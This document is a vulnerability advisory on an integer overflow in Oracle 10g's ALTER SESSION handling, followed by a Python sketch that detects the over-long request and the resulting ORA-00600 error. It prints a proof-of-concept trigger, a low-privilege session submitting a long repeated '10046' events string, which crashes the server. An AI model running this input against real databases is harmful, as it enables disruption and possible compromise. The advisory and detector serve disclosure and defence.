Oracle 10g ALTER SESSION Integer Overflow Vulnerability
2006-08-01 12:12
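Oracle has an integer overflow vulnerability in its handling of alter session operations. A remote attacker may be able to exploit it to execute arbitrary commands on the server.
A user with only the SELECT privilege can trigger the vulnerability by submitting an over-long alter session request, resulting in arbitrary command execution in the database.
Test method:
Connect to the database as a user with only the CREATE SESSION privilege.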
SQL> alter session set events '10046 trace name context forever, level 16';
Session altered.
SQL> alter session set events
'10046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
00461004610046trace
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [],
[]
The vendor has not yet provided a patch or upgrade.
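With no patch available, one option is to watch for the over-long request and the resulting internal error. The following is an added detection sketch, not part of the original advisory or any Oracle tooling: it flags `alter session set events` statements whose event specification is abnormally long, and extracts the first ORA-00600 argument from a log line. The function names, the two thresholds and the sample input are assumptions constructed for illustration.

```python
import re

# Matches: alter session set events '<spec>' (case-insensitive, spec may span lines)
EVENTS_RE = re.compile(r"alter\s+session\s+set\s+events\s*'([^']*)'", re.I | re.S)
# Matches the internal error shown in the advisory, keeping its first argument
ORA600_RE = re.compile(r"ORA-00600:.*?arguments:\s*\[(\d+)\]")

MAX_EVENT_DIGITS = 5   # assumption: event numbers such as 10046 are five digits
MAX_SPEC_LEN = 256     # assumption: generous ceiling for a legitimate event spec


def check_statement(sql):
    """Return a list of reasons the statement looks like the over-long request."""
    reasons = []
    for spec in EVENTS_RE.findall(sql):
        compact = re.sub(r"\s+", "", spec)  # SQL*Plus line wraps split the literal
        lead = re.match(r"\d+", compact)
        if lead and len(lead.group()) > MAX_EVENT_DIGITS:
            reasons.append("event number has %d digits" % len(lead.group()))
        if len(compact) > MAX_SPEC_LEN:
            reasons.append("event spec is %d characters" % len(compact))
    return reasons


def check_error_line(line):
    """Return the first ORA-00600 argument as int, or None if not an ORA-00600 line."""
    m = ORA600_RE.search(line)
    return int(m.group(1)) if m else None


# Constructed sample input (not captured from a real system)
SAMPLE_STATEMENTS = [
    "alter session set events '10046 trace name context forever, level 16'",
    "ALTER SESSION SET EVENTS\n'" + "10046" * 200 + "trace\nname context forever, level 16'",
    "alter session set nls_date_format = 'YYYY-MM-DD'",
]
SAMPLE_LOG = "ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], []"

if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        print(repr(stmt[:40]), "->", check_statement(stmt) or "ok")
    print("ORA-00600 first argument:", check_error_line(SAMPLE_LOG))
```

The statements would come from whatever SQL capture is available (audit trail, proxy or network logs); the thresholds should be tuned to the event specifications legitimately used at the site.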